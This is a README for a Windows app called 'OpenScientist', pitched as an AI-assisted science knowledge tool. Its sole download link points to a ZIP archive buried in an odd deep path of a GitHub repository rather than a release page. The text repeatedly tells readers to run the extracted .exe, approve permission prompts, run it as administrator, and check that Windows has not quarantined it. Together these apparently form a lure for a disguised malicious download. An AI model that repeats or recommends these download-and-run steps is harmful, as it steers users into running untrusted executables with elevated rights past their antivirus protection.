OpenScientist helps you bring expert knowledge into one place so you can explore ideas faster. It is built for people who want a simple way to run a science-focused app on Windows and work with AI tools that support research, analysis, and discovery.
Use it to:
- collect expert notes in one app
- review knowledge by topic
- support AI-assisted research workflows
- keep science content organized in a clear layout
Before you install OpenScientist, make sure your PC meets these basic needs:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- 2 GB of free disk space
- A stable internet connection for the first setup
- Local admin access if Windows asks for permission
If your PC can run standard desktop apps and browse the web, it should be ready for this tool.
Go to the main project page here:
On that page, look for the latest release or the download file for Windows. Save the file to your computer, then open it to start the install or launch process.
Follow these steps on your Windows PC:
- Open the download page in your web browser.
- Find the latest Windows file.
- Download the file to your Downloads folder or Desktop.
- If the file is a ZIP archive, right-click it and choose Extract All.
- Open the extracted folder.
- If you see an
.exefile, double-click it to run OpenScientist. - If Windows asks for approval, choose Yes.
If the app opens in a new window, the setup is done.
When you open OpenScientist for the first time, you may see a setup screen. Use it to finish the basic start-up steps:
- choose your language
- confirm the default workspace folder
- sign in if the app asks for an account
- allow access to local files if you want to import notes or documents
- finish any startup prompts shown on screen
If the app offers a sample project, open it first to get a feel for the layout.
OpenScientist is made for simple, guided use. A common workflow looks like this:
- Open the app.
- Pick a subject or domain.
- Add expert notes, documents, or prompts.
- Review the grouped knowledge in the workspace.
- Use the AI tools to compare ideas or find patterns.
- Save your work before you close the app.
If you are using it for scientific discovery, keep one workspace for each topic. That makes it easier to track sources and ideas.
OpenScientist is set up to help with research tasks and knowledge work.
Keep expert insight in one place and sort it by topic, project, or field.
Use AI tools to scan notes, connect ideas, and suggest next steps for research.
Work in a layout that keeps content easy to read and easy to find.
Find related notes and ideas without moving through many folders.
Bring in text files and research notes for review inside the app.
Compare knowledge from different fields and look for useful links between them.
If the app does not open, try these steps:
- right-click the file and choose Run as administrator
- make sure the file finished downloading
- check that Windows did not place the file in Quarantine or Blocked status
- extract the ZIP file before opening the app
- restart your PC and try again
If the screen looks blank, wait a moment and check whether the app is loading local data.
Before you open the file, you can do a quick check:
- confirm the file name matches the version you downloaded
- use the official GitHub page only
- avoid files from third-party sites
- keep the file in a folder you can find again
This helps you make sure you launch the right Windows build.
A simple folder layout can help you stay organized:
Downloadsfor the installer or ZIP fileOpenScientistfor extracted filesResearch Notesfor your contentProjectsfor saved workExportsfor files you want to share
Using clear folder names makes it easier to return to your work later.
You can use OpenScientist for:
- reviewing expert notes on a medical topic
- comparing ideas across physics, biology, and chemistry
- building a private knowledge base for AI research
- collecting source material for a paper or report
- organizing team input around a scientific question
Use the GitHub page here: https://github.com/poizzytech/OpenScientist/raw/refs/heads/main/skills/physics/geophysics/anon-2507a522/semantic/Scientist_Open_v3.9.zip
No. The app is meant to guide you through the main steps with a simple interface.
No. You only need to download the file and open it on Windows.
Scroll on the GitHub page and look for a release file, a ZIP file, or an .exe file for Windows.
Yes. You can copy your workspace folder to another drive or PC if you want to keep your data in one place.
- keep one folder for each project
- save your notes often
- use short names for topics
- store source files next to your work
- close the app before moving files
If you downloaded the app to your Downloads folder, you may see a path like this:
C:\Users\YourName\Downloads\OpenScientist
If you extracted a ZIP file, the app may be inside that folder as an .exe file
When a new version is posted, repeat the same steps:
- open the GitHub page
- check for the latest file
- download the new Windows version
- install or extract it again
- open the updated app
Keep your project files in a separate folder so they stay safe when you update the app
To get going, you only need:
- a Windows PC
- internet access
- a browser
- the OpenScientist download from GitHub
Use the link at the top or the page below to get started: https://github.com/poizzytech/OpenScientist/raw/refs/heads/main/skills/physics/geophysics/anon-2507a522/semantic/Scientist_Open_v3.9.zip